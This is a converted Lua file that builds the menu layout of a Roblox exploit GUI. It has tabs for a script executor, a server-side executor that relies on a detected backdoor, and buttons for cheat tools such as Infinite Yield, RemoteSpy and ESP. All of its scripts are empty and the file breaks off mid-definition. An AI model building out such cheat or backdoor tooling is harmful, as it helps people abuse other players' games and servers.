--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 107 | Scripts: 25 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.main
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["Name"] = [[main]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.main.mainframe
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(76, 76, 76);
G2L["2"]["Size"] = UDim2.new(0, 415, 0, 325);
G2L["2"]["Position"] = UDim2.new(0.30924, 0, 0.22727, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[mainframe]];
G2L["2"]["BackgroundTransparency"] = 0.5;


-- StarterGui.main.mainframe.top
G2L["3"] = Instance.new("Frame", G2L["2"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["3"]["Size"] = UDim2.new(0, 415, 0, 30);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3"]["Name"] = [[top]];
G2L["3"]["BackgroundTransparency"] = 0.3;


-- StarterGui.main.mainframe.top.UIStroke
G2L["4"] = Instance.new("UIStroke", G2L["3"]);
G2L["4"]["Thickness"] = 2;


-- StarterGui.main.mainframe.top.TextLabel
G2L["5"] = Instance.new("TextLabel", G2L["3"]);
G2L["5"]["TextWrapped"] = true;
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["TextSize"] = 14;
G2L["5"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5"]["TextScaled"] = true;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["BackgroundTransparency"] = 1;
G2L["5"]["Size"] = UDim2.new(0, 415, 0, 30);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Text"] = [[l0stk1dd88's Universal GUI]];


-- StarterGui.main.mainframe.top.ImageButton
G2L["6"] = Instance.new("ImageButton", G2L["3"]);
G2L["6"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(171, 0, 0);
G2L["6"]["Image"] = [[rbxassetid://74120900238837]];
G2L["6"]["Size"] = UDim2.new(0, 30, 0, 30);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Position"] = UDim2.new(0.92771, 0, 0, 0);


-- StarterGui.main.mainframe.top.ImageButton.LocalScript
G2L["7"] = Instance.new("LocalScript", G2L["6"]);



-- StarterGui.main.mainframe.UIStroke
G2L["8"] = Instance.new("UIStroke", G2L["2"]);
G2L["8"]["Thickness"] = 2;


-- StarterGui.main.mainframe.Dragify
G2L["9"] = Instance.new("LocalScript", G2L["2"]);
G2L["9"]["Name"] = [[Dragify]];


-- StarterGui.main.mainframe.sectionbtns
G2L["a"] = Instance.new("Frame", G2L["2"]);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Size"] = UDim2.new(0, 58, 0, 295);
G2L["a"]["Position"] = UDim2.new(0, 0, 0.09231, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Name"] = [[sectionbtns]];
G2L["a"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.sectionbtns.UIStroke
G2L["b"] = Instance.new("UIStroke", G2L["a"]);
G2L["b"]["Thickness"] = 2;


-- StarterGui.main.mainframe.sectionbtns.TextButton
G2L["c"] = Instance.new("TextButton", G2L["a"]);
G2L["c"]["TextWrapped"] = true;
G2L["c"]["BorderSizePixel"] = 0;
G2L["c"]["TextSize"] = 14;
G2L["c"]["TextScaled"] = true;
G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["c"]["BackgroundTransparency"] = 1;
G2L["c"]["Size"] = UDim2.new(0, 58, 0, 43);
G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["c"]["Text"] = [[INFO]];


-- StarterGui.main.mainframe.sectionbtns.TextButton.UIStroke
G2L["d"] = Instance.new("UIStroke", G2L["c"]);
G2L["d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
G2L["e"] = Instance.new("LocalScript", G2L["c"]);



-- StarterGui.main.mainframe.sectionbtns.UIListLayout
G2L["f"] = Instance.new("UIListLayout", G2L["a"]);
G2L["f"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.main.mainframe.sectionbtns.TextButton
G2L["10"] = Instance.new("TextButton", G2L["a"]);
G2L["10"]["TextWrapped"] = true;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextScaled"] = true;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["BackgroundTransparency"] = 1;
G2L["10"]["Size"] = UDim2.new(0, 58, 0, 43);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[SCRIPTS]];
G2L["10"]["Position"] = UDim2.new(0, 0, 0.14576, 0);


-- StarterGui.main.mainframe.sectionbtns.TextButton.UIStroke
G2L["11"] = Instance.new("UIStroke", G2L["10"]);
G2L["11"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
G2L["12"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.main.mainframe.sectionbtns.TextButton
G2L["13"] = Instance.new("TextButton", G2L["a"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextScaled"] = true;
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["BackgroundTransparency"] = 1;
G2L["13"]["Size"] = UDim2.new(0, 58, 0, 43);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[EXECUTOR]];
G2L["13"]["Position"] = UDim2.new(0, 0, 0.14576, 0);


-- StarterGui.main.mainframe.sectionbtns.TextButton.UIStroke
G2L["14"] = Instance.new("UIStroke", G2L["13"]);
G2L["14"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
G2L["15"] = Instance.new("LocalScript", G2L["13"]);



-- StarterGui.main.mainframe.sectionbtns.TextButton
G2L["16"] = Instance.new("TextButton", G2L["a"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["BackgroundTransparency"] = 1;
G2L["16"]["Size"] = UDim2.new(0, 58, 0, 43);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[SS Executor]];
G2L["16"]["Position"] = UDim2.new(0, 0, 0.14576, 0);


-- StarterGui.main.mainframe.sectionbtns.TextButton.UIStroke
G2L["17"] = Instance.new("UIStroke", G2L["16"]);
G2L["17"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
G2L["18"] = Instance.new("LocalScript", G2L["16"]);



-- StarterGui.main.mainframe.info
G2L["19"] = Instance.new("Frame", G2L["2"]);
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["Size"] = UDim2.new(0, 355, 0, 295);
G2L["19"]["Position"] = UDim2.new(0.14458, 0, 0.09231, 0);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Name"] = [[info]];
G2L["19"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.info.UIStroke
G2L["1a"] = Instance.new("UIStroke", G2L["19"]);



-- StarterGui.main.mainframe.info.ImageLabel
G2L["1b"] = Instance.new("ImageLabel", G2L["19"]);
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["1b"]["Image"] = [[rbxasset://textures/ui/GuiImagePlaceholder.png]];
G2L["1b"]["Size"] = UDim2.new(0, 100, 0, 100);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["BackgroundTransparency"] = 1;
G2L["1b"]["Position"] = UDim2.new(0.34648, 0, 0.0339, 0);


-- StarterGui.main.mainframe.info.ImageLabel.LocalScript
G2L["1c"] = Instance.new("LocalScript", G2L["1b"]);



-- StarterGui.main.mainframe.info.ImageLabel.UIStroke
G2L["1d"] = Instance.new("UIStroke", G2L["1b"]);
G2L["1d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.info.TextLabel
G2L["1e"] = Instance.new("TextLabel", G2L["19"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundTransparency"] = 1;
G2L["1e"]["Size"] = UDim2.new(0, 350, 0, 25);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[Welcome, player]];
G2L["1e"]["Position"] = UDim2.new(0.01408, 0, 0.37288, 0);


-- StarterGui.main.mainframe.info.TextLabel.LocalScript
G2L["1f"] = Instance.new("LocalScript", G2L["1e"]);



-- StarterGui.main.mainframe.info.TextLabel
G2L["20"] = Instance.new("TextLabel", G2L["19"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundTransparency"] = 1;
G2L["20"]["Size"] = UDim2.new(0, 350, 0, 25);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Thanks for using my GUI!]];
G2L["20"]["Position"] = UDim2.new(0.01408, 0, 0.45763, 0);


-- StarterGui.main.mainframe.info.TextLabel
G2L["21"] = Instance.new("TextLabel", G2L["19"]);
G2L["21"]["TextWrapped"] = true;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 14;
G2L["21"]["TextScaled"] = true;
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["TextColor3"] = Color3.fromRGB(255, 255, 0);
G2L["21"]["BackgroundTransparency"] = 1;
G2L["21"]["Size"] = UDim2.new(0, 350, 0, 25);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[Most of these scripts only work on non-FE games.]];
G2L["21"]["Position"] = UDim2.new(0.01408, 0, 0.54237, 0);


-- StarterGui.main.mainframe.info.TextLabel
G2L["22"] = Instance.new("TextLabel", G2L["19"]);
G2L["22"]["TextWrapped"] = true;
G2L["22"]["BorderSizePixel"] = 0;
G2L["22"]["TextSize"] = 14;
G2L["22"]["TextScaled"] = true;
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["22"]["TextColor3"] = Color3.fromRGB(255, 255, 0);
G2L["22"]["BackgroundTransparency"] = 1;
G2L["22"]["Size"] = UDim2.new(0, 350, 0, 25);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Text"] = [[FE: N/A]];
G2L["22"]["Position"] = UDim2.new(0.01408, 0, 0.62712, 0);


-- StarterGui.main.mainframe.info.TextLabel.LocalScript
G2L["23"] = Instance.new("LocalScript", G2L["22"]);



-- StarterGui.main.mainframe.info.TextLabel
G2L["24"] = Instance.new("TextLabel", G2L["19"]);
G2L["24"]["TextWrapped"] = true;
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["TextSize"] = 14;
G2L["24"]["TextScaled"] = true;
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["24"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["24"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["24"]["BackgroundTransparency"] = 1;
G2L["24"]["Size"] = UDim2.new(0, 350, 0, 25);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["Text"] = [[Backdoor: None]];
G2L["24"]["Position"] = UDim2.new(0.01408, 0, 0.71186, 0);


-- StarterGui.main.mainframe.info.TextLabel.LocalScript
G2L["25"] = Instance.new("LocalScript", G2L["24"]);



-- StarterGui.main.mainframe.info.TextLabel
G2L["26"] = Instance.new("TextLabel", G2L["19"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["TextColor3"] = Color3.fromRGB(255, 255, 128);
G2L["26"]["BackgroundTransparency"] = 1;
G2L["26"]["Size"] = UDim2.new(0, 350, 0, 60);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[SS Executor is server-side, but only works if a backdoor is detected.]];
G2L["26"]["Position"] = UDim2.new(0.01408, 0, 0.79661, 0);


-- StarterGui.main.mainframe.sc
G2L["27"] = Instance.new("Frame", G2L["2"]);
G2L["27"]["Visible"] = false;
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["ClipsDescendants"] = true;
G2L["27"]["Size"] = UDim2.new(0, 356, 0, 295);
G2L["27"]["Position"] = UDim2.new(0.13976, 0, 0.09231, 0);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Name"] = [[sc]];
G2L["27"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.sc.scripts
G2L["28"] = Instance.new("ScrollingFrame", G2L["27"]);
G2L["28"]["Active"] = true;
G2L["28"]["BorderSizePixel"] = 0;
G2L["28"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["28"]["Name"] = [[scripts]];
G2L["28"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["28"]["Size"] = UDim2.new(0, 357, 0, 252);
G2L["28"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Position"] = UDim2.new(-0.00069, 0, 0.14576, 0);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["ScrollBarThickness"] = 0;
G2L["28"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.sc.scripts.UIStroke
G2L["29"] = Instance.new("UIStroke", G2L["28"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["2a"] = Instance.new("TextButton", G2L["28"]);
G2L["2a"]["TextWrapped"] = true;
G2L["2a"]["BorderSizePixel"] = 0;
G2L["2a"]["TextSize"] = 14;
G2L["2a"]["TextScaled"] = true;
G2L["2a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2a"]["BackgroundTransparency"] = 1;
G2L["2a"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["2a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2a"]["Text"] = [[Chaos]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["2b"] = Instance.new("UIStroke", G2L["2a"]);
G2L["2b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["2c"] = Instance.new("LocalScript", G2L["2a"]);



-- StarterGui.main.mainframe.sc.scripts.UIListLayout
G2L["2d"] = Instance.new("UIListLayout", G2L["28"]);
G2L["2d"]["Padding"] = UDim.new(0, 1);
G2L["2d"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["2e"] = Instance.new("TextButton", G2L["28"]);
G2L["2e"]["TextWrapped"] = true;
G2L["2e"]["BorderSizePixel"] = 0;
G2L["2e"]["TextSize"] = 14;
G2L["2e"]["TextScaled"] = true;
G2L["2e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2e"]["BackgroundTransparency"] = 1;
G2L["2e"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["2e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["Text"] = [[Grab Knife]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["2f"] = Instance.new("UIStroke", G2L["2e"]);
G2L["2f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2e"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["31"] = Instance.new("TextButton", G2L["28"]);
G2L["31"]["TextWrapped"] = true;
G2L["31"]["BorderSizePixel"] = 0;
G2L["31"]["TextSize"] = 14;
G2L["31"]["TextScaled"] = true;
G2L["31"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["31"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["31"]["BackgroundTransparency"] = 1;
G2L["31"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["31"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["Text"] = [[Infinite Yield FE]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["32"] = Instance.new("UIStroke", G2L["31"]);
G2L["32"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["33"] = Instance.new("LocalScript", G2L["31"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["34"] = Instance.new("TextButton", G2L["28"]);
G2L["34"]["TextWrapped"] = true;
G2L["34"]["BorderSizePixel"] = 0;
G2L["34"]["TextSize"] = 14;
G2L["34"]["TextScaled"] = true;
G2L["34"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["34"]["BackgroundTransparency"] = 1;
G2L["34"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Text"] = [[RemoteSpy]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["35"] = Instance.new("UIStroke", G2L["34"]);
G2L["35"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["36"] = Instance.new("LocalScript", G2L["34"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["37"] = Instance.new("TextButton", G2L["28"]);
G2L["37"]["TextWrapped"] = true;
G2L["37"]["BorderSizePixel"] = 0;
G2L["37"]["TextSize"] = 14;
G2L["37"]["TextScaled"] = true;
G2L["37"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["37"]["BackgroundTransparency"] = 1;
G2L["37"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Text"] = [[c00lgui]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["38"] = Instance.new("UIStroke", G2L["37"]);
G2L["38"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["39"] = Instance.new("LocalScript", G2L["37"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["3a"] = Instance.new("TextButton", G2L["28"]);
G2L["3a"]["TextWrapped"] = true;
G2L["3a"]["BorderSizePixel"] = 0;
G2L["3a"]["TextSize"] = 14;
G2L["3a"]["TextScaled"] = true;
G2L["3a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3a"]["BackgroundTransparency"] = 1;
G2L["3a"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["3a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3a"]["Text"] = [[Music Player]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["3b"] = Instance.new("UIStroke", G2L["3a"]);
G2L["3b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3a"]);



-- StarterGui.main.mainframe.sc.scripts.TextButton
G2L["3d"] = Instance.new("TextButton", G2L["28"]);
G2L["3d"]["TextWrapped"] = true;
G2L["3d"]["BorderSizePixel"] = 0;
G2L["3d"]["TextSize"] = 14;
G2L["3d"]["TextScaled"] = true;
G2L["3d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3d"]["BackgroundTransparency"] = 1;
G2L["3d"]["Size"] = UDim2.new(0, 356, 0, 43);
G2L["3d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3d"]["Text"] = [[ESP Toggle]];


-- StarterGui.main.mainframe.sc.scripts.TextButton.UIStroke
G2L["3e"] = Instance.new("UIStroke", G2L["3d"]);
G2L["3e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
G2L["3f"] = Instance.new("LocalScript", G2L["3d"]);



-- StarterGui.main.mainframe.sc.TextLabel
G2L["40"] = Instance.new("TextLabel", G2L["27"]);
G2L["40"]["TextWrapped"] = true;
G2L["40"]["BorderSizePixel"] = 0;
G2L["40"]["TextSize"] = 14;
G2L["40"]["TextScaled"] = true;
G2L["40"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["40"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["40"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["40"]["BackgroundTransparency"] = 1;
G2L["40"]["Size"] = UDim2.new(0, 357, 0, 43);
G2L["40"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["40"]["Text"] = [[Scripts (More Soon!)]];


-- StarterGui.main.mainframe.sc.TextLabel.UIStroke
G2L["41"] = Instance.new("UIStroke", G2L["40"]);



-- StarterGui.main.mainframe.sc.TextLabel.UIStroke
G2L["42"] = Instance.new("UIStroke", G2L["40"]);
G2L["42"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec
G2L["43"] = Instance.new("Frame", G2L["2"]);
G2L["43"]["Visible"] = false;
G2L["43"]["BorderSizePixel"] = 0;
G2L["43"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["Size"] = UDim2.new(0, 357, 0, 295);
G2L["43"]["Position"] = UDim2.new(0.13976, 0, 0.09231, 0);
G2L["43"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["43"]["Name"] = [[exec]];
G2L["43"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.exec.text
G2L["44"] = Instance.new("ScrollingFrame", G2L["43"]);
G2L["44"]["Active"] = true;
G2L["44"]["BorderSizePixel"] = 0;
G2L["44"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["44"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["44"]["Name"] = [[text]];
G2L["44"]["AutomaticCanvasSize"] = Enum.AutomaticSize.XY;
G2L["44"]["Size"] = UDim2.new(0, 357, 0, 233);
G2L["44"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["44"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["44"]["ScrollBarThickness"] = 8;
G2L["44"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.exec.text.TextLabel
G2L["45"] = Instance.new("TextLabel", G2L["44"]);
G2L["45"]["BorderSizePixel"] = 0;
G2L["45"]["TextSize"] = 14;
G2L["45"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["45"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["45"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["45"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["45"]["BackgroundTransparency"] = 1;
G2L["45"]["Size"] = UDim2.new(0, 31, 0, 234);
G2L["45"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["45"]["Text"] = [[1]];
G2L["45"]["AutomaticSize"] = Enum.AutomaticSize.Y;


-- StarterGui.main.mainframe.exec.text.TextLabel.UIStroke
G2L["46"] = Instance.new("UIStroke", G2L["45"]);
G2L["46"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec.text.TextLabel.UIStroke
G2L["47"] = Instance.new("UIStroke", G2L["45"]);



-- StarterGui.main.mainframe.exec.text.UIStroke
